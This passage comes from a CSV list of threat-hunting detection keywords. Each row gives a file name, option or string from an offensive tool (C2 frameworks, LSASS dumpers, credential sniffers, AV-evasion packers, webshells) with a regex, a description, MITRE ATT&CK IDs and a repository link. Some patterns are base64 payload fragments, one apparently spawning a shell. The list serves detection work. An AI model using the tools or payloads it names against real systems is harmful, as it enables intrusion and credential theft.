TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","0","N/A","10","10","45","5","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z" "*payload_spellshell.exe*",".{0,1000}payload_spellshell\.exe.{0,1000}","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","1","N/A","10","10","45","5","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z" "*payload_tidy.rb*",".{0,1000}payload_tidy\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*Payload_Type/freyja/*",".{0,1000}Payload_Type\/freyja\/.{0,1000}","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","10","10","42","9","2024-03-10T19:25:46Z","2022-09-28T17:20:04Z" "*PayloadCommsHost*",".{0,1000}PayloadCommsHost.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*--payload-cookie*",".{0,1000}\-\-payload\-cookie.{0,1000}","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","1","N/A","10","10","470","84","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z" "*Payload-Download-Cradles*",".{0,1000}Payload\-Download\-Cradles.{0,1000}","offensive_tool_keyword","Payload-Download-Cradles","This are different types of download cradles which should be an inspiration to play and create new download cradles to bypass AV/EPP/EDR in context of download cradle detections.","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","1","N/A","N/A","3","249","54","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z" "*PayloadFormat.ASSEMBLY*",".{0,1000}PayloadFormat\.ASSEMBLY.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*PayloadFormat.DLL*",".{0,1000}PayloadFormat\.DLL.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*PayloadFormat.EXE*",".{0,1000}PayloadFormat\.EXE.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*PayloadFormat.POWERSHELL*",".{0,1000}PayloadFormat\.POWERSHELL.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*PayloadFormat.SHELLCODE*",".{0,1000}PayloadFormat\.SHELLCODE.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*PayloadFormat.SVC_EXE*",".{0,1000}PayloadFormat\.SVC_EXE.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*payloadgenerator.py*",".{0,1000}payloadgenerator\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*payloads/Follina*",".{0,1000}payloads\/Follina.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*payloads/Powershell*",".{0,1000}payloads\/Powershell.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*payloads/shellcodes*",".{0,1000}payloads\/shellcodes.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*payloads_examples*calc.js*",".{0,1000}payloads_examples.{0,1000}calc\.js.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","1","N/A","10","5","462","114","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" "*payloads_examples*calc.xll*",".{0,1000}payloads_examples.{0,1000}calc\.xll.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","1","N/A","10","5","462","114","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" "*PayloadsAllTheThings*",".{0,1000}PayloadsAllTheThings.{0,1000}","offensive_tool_keyword","PayloadsAllTheThings","A list of useful payloads and bypasses for Web Application Security. Feel free to improve with your payloads and techniques ! ","T1210 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/Bo0oM/PayloadsAllTheThings","1","1","N/A","N/A","1","3","4","2019-02-11T06:34:14Z","2019-02-11T06:29:45Z" "*PayloadService.*",".{0,1000}PayloadService\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*--payload-type Macro*",".{0,1000}\-\-payload\-type\sMacro.{0,1000}","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","0","N/A","N/A","6","519","77","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" "*PayloadType.BIND_PIPE*",".{0,1000}PayloadType\.BIND_PIPE.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*PayloadType.EXTERNAL*",".{0,1000}PayloadType\.EXTERNAL.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*PayloadType.HTTP*",".{0,1000}PayloadType\.HTTP.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*PayloadType.REVERSE_TCP*",".{0,1000}PayloadType\.REVERSE_TCP.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*--payload-url */pwn.html",".{0,1000}\-\-payload\-url\s.{0,1000}\/pwn\.html","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/ItsNee/Follina-CVE-2022-30190-POC","1","0","N/A","N/A","1","5","0","2022-07-04T13:27:13Z","2022-06-05T13:54:04Z" "*pcap_linktypes.py*",".{0,1000}pcap_linktypes\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*pcap2john.py*",".{0,1000}pcap2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*pcapfile.py*",".{0,1000}pcapfile\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*PcapXray*",".{0,1000}PcapXray.{0,1000}","offensive_tool_keyword","PcapXray","Given a Pcap File. plot a network diagram displaying hosts in the network. network traffic. highlight important traffic and Tor traffic as well as potential malicious traffic including data involved in the communication.","T1040 - T1071 - T1070 - T1074 - T1075 - T1078 - T1048","TA0001 - TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Srinivas11789/PcapXray","1","1","N/A","N/A","10","1643","275","2022-03-28T15:31:26Z","2017-10-02T04:47:51Z" "*Pcredz -d *",".{0,1000}Pcredz\s\-d\s.{0,1000}","offensive_tool_keyword","Pcredz","This tool extracts Credit card numbers. NTLM(DCE-RPC. HTTP. SQL. LDAP. etc). Kerberos (AS-REQ Pre-Auth etype 23). HTTP Basic. SNMP. POP. SMTP. FTP. IMAP. etc from a pcap file or from a live interface.","T1116 - T1003 - T1002 - T1001 - T1005 - T1552","TA0003 - TA0002 - TA0011","N/A","N/A","Credential Access","https://github.com/lgandx/Pcredz","1","0","N/A","N/A","10","1872","383","2024-01-07T14:17:46Z","2014-04-07T02:03:33Z" "*Pcredz -f *",".{0,1000}Pcredz\s\-f\s.{0,1000}","offensive_tool_keyword","Pcredz","This tool extracts Credit card numbers. NTLM(DCE-RPC. HTTP. SQL. LDAP. etc). Kerberos (AS-REQ Pre-Auth etype 23). HTTP Basic. SNMP. POP. SMTP. FTP. IMAP. etc from a pcap file or from a live interface.","T1116 - T1003 - T1002 - T1001 - T1005 - T1552","TA0003 - TA0002 - TA0011","N/A","N/A","Credential Access","https://github.com/lgandx/Pcredz","1","0","N/A","N/A","10","1872","383","2024-01-07T14:17:46Z","2014-04-07T02:03:33Z" "*PCredz -f *.pcap*",".{0,1000}PCredz\s\-f\s.{0,1000}\.pcap.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*Pcredz -i *",".{0,1000}Pcredz\s\-i\s.{0,1000}","offensive_tool_keyword","Pcredz","This tool extracts Credit card numbers. NTLM(DCE-RPC. HTTP. SQL. LDAP. etc). Kerberos (AS-REQ Pre-Auth etype 23). HTTP Basic. SNMP. POP. SMTP. FTP. IMAP. etc from a pcap file or from a live interface.","T1116 - T1003 - T1002 - T1001 - T1005 - T1552","TA0003 - TA0002 - TA0011","N/A","N/A","Credential Access","https://github.com/lgandx/Pcredz","1","0","N/A","N/A","10","1872","383","2024-01-07T14:17:46Z","2014-04-07T02:03:33Z" "*PCVAIExhbmd1YWdlPSJDIyIlPgpUaGlzIGlzIHRoZSBhdHRhY2tlcidzIGZpbGUgPGJyLz4KUnVubmluZyBvbiB0aGUgc2VydmVyIGlmIGA8JT0xMzM4LTElPmAgaXMgMTMzNy4*",".{0,1000}PCVAIExhbmd1YWdlPSJDIyIlPgpUaGlzIGlzIHRoZSBhdHRhY2tlcidzIGZpbGUgPGJyLz4KUnVubmluZyBvbiB0aGUgc2VydmVyIGlmIGA8JT0xMzM4LTElPmAgaXMgMTMzNy4.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","3026","460","2023-10-17T12:27:23Z","2017-09-18T17:48:08Z" "*PD9waHAKcGNudGxfZXhlYygnL2Jpbi9zaCcsIFsnLXAnXSk7Cj8*",".{0,1000}PD9waHAKcGNudGxfZXhlYygnL2Jpbi9zaCcsIFsnLXAnXSk7Cj8.{0,1000}","offensive_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","9","4","359","72","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z" "*pdadjkfkgcafgbceimcpbkalnfnepbnk*",".{0,1000}pdadjkfkgcafgbceimcpbkalnfnepbnk.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*PDF_Payload*Doomfist.pdf*",".{0,1000}PDF_Payload.{0,1000}Doomfist\.pdf.{0,1000}","offensive_tool_keyword","Mystikal","macOS Initial Access Payload Generator","T1059.005 - T1204.002 - T1566.001","TA0002 - TA0001","N/A","N/A","Exploitation tools","https://github.com/D00MFist/Mystikal","1","1","N/A","9","3","268","38","2024-01-10T15:48:12Z","2021-05-03T14:46:16Z" "*pdf2john.pl*",".{0,1000}pdf2john\.pl.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*pdfcrack -f *.pdf*",".{0,1000}pdfcrack\s\-f\s.{0,1000}\.pdf.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*PDONUT_INSTANCE*",".{0,1000}PDONUT_INSTANCE.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","3229","590","2024-03-31T02:30:39Z","2019-03-27T23:24:44Z" "*pe_inject.rb*",".{0,1000}pe_inject\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*pe_packer/dll_main.c*",".{0,1000}pe_packer\/dll_main\.c.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*pe_packer/exe_main.c*",".{0,1000}pe_packer\/exe_main\.c.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*pe_packer/main.c*",".{0,1000}pe_packer\/main\.c.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*pe_packer\dll_main.c*",".{0,1000}pe_packer\\dll_main\.c.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*pe_packer\exe_main.c*",".{0,1000}pe_packer\\exe_main\.c.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*pe_packer\main.c*",".{0,1000}pe_packer\\main\.c.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*pe_packer_exe.exe*",".{0,1000}pe_packer_exe\.exe.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*pe2sh.exe*",".{0,1000}pe2sh\.exe.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*pe2shc.exe *",".{0,1000}pe2shc\.exe\s.{0,1000}","offensive_tool_keyword","pe_to_shellcode","Converts PE into a shellcode","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/hasherezade/pe_to_shellcode","1","0","N/A","N/A","10","2203","411","2023-08-15T14:42:12Z","2018-08-19T22:57:07Z" "*pe2shc.exe*",".{0,1000}pe2shc\.exe.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*pe2shc_*.zip*",".{0,1000}pe2shc_.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*Pe2Shellcode.py*",".{0,1000}Pe2Shellcode\.py.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*Peaky-XD/webshell*",".{0,1000}Peaky\-XD\/webshell.{0,1000}","offensive_tool_keyword","webshell","A collection of webshell","T1505.003 - T1100 - T1190 - T1505.004","TA0003 - TA0011 ","N/A","N/A","Persistence","https://github.com/Peaky-XD/webshell","1","1","N/A","10","1","48","11","2024-03-02T05:51:24Z","2024-02-28T15:12:42Z" "*PEASS-ng-master*",".{0,1000}PEASS\-ng\-master.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","14895","2960","2024-04-21T04:35:22Z","2019-01-13T19:58:24Z" "*peCloak*",".{0,1000}peCloak.{0,1000}","offensive_tool_keyword","peCloak","peCloak.py (beta) - A Multi-Pass Encoder & Heuristic Sandbox Bypass AV Evasion Tool","T1027.002 - T1059.003 - T1140 - T1562.001","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/v-p-b/peCloakCapstone/blob/master/peCloak.py","1","0","N/A","N/A","2","102","39","2016-03-21T23:38:15Z","2015-08-19T14:46:50Z" "*peiga/DumpThatLSASS*",".{0,1000}peiga\/DumpThatLSASS.{0,1000}","offensive_tool_keyword","DumpThatLSASS","Dumping LSASS by Unhooking MiniDumpWriteDump by getting a fresh DbgHelp.dll copy from the disk","T1003 - T1055.011 - T1027 - T1564.001","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/peiga/DumpThatLSASS","1","1","N/A","10","1","29","81","2022-09-24T22:39:04Z","2022-09-24T22:41:19Z" "*peinject.rb*",".{0,1000}peinject\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 